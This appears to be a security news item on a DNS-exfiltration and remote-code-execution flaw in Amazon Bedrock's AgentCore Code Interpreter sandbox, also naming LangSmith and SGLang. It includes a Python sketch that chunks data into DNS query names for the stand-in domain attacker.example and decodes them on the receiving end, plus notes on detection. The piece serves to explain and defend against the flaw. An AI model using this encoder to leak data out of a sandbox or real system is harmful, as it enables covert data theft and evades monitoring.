A critical vulnerability has been discovered in Amazon Bedrock that allows attackers to exfiltrate sensitive data and achieve remote code execution (RCE) via DNS queries. The flaw, found in the sandbox mode of the AgentCore Code Interpreter, lets malicious actors establish interactive shells, potentially leading to significant security breaches. LangSmith and SGLang are similarly affected, highlighting the need for stronger security controls in AI code-execution environments.

The vulnerability can be exploited because the sandbox permits outbound DNS queries, which attackers can abuse to create a covert communication channel. This oversight can have severe consequences, including unauthorized data access and lateral movement within a network. The discovery underscores the importance of robust security testing and validation in AI systems; what matters most to practitioners is promptly assessing and mitigating these weaknesses before they lead to a breach.
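To make the covert-channel mechanism concrete, the sketch below shows the general technique of DNS exfiltration: data is base32-encoded (DNS labels are case-insensitive and limited to 63 bytes) and split across the subdomain labels of queries to an attacker-controlled domain. This is a minimal, self-contained illustration of the encoding idea only, not the actual exploit; the `attacker.example` domain and all function names are hypothetical, and no packets are sent.

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 bytes (RFC 1035)

def encode_exfil_queries(data: bytes, domain: str = "attacker.example"):
    """Encode arbitrary bytes into DNS query names (base32, chunked).

    In a real attack, each returned name would be resolved from inside
    the sandbox; the attacker's nameserver logs the queries.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    # One query per chunk; a sequence-number label preserves ordering.
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]

def decode_exfil_queries(queries, domain: str = "attacker.example"):
    """Receiver side: reassemble the payload from observed query names."""
    suffix = "." + domain
    parts = {}
    for q in queries:
        seq, chunk = q[: -len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    b32 = "".join(parts[i] for i in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)  # restore base32 padding
    return base64.b32decode(b32)
```

Because queries like these look like ordinary name resolution, defenses typically involve blocking outbound DNS from sandboxes entirely (forcing resolution through a controlled resolver) and monitoring for high-entropy or high-volume subdomain lookups.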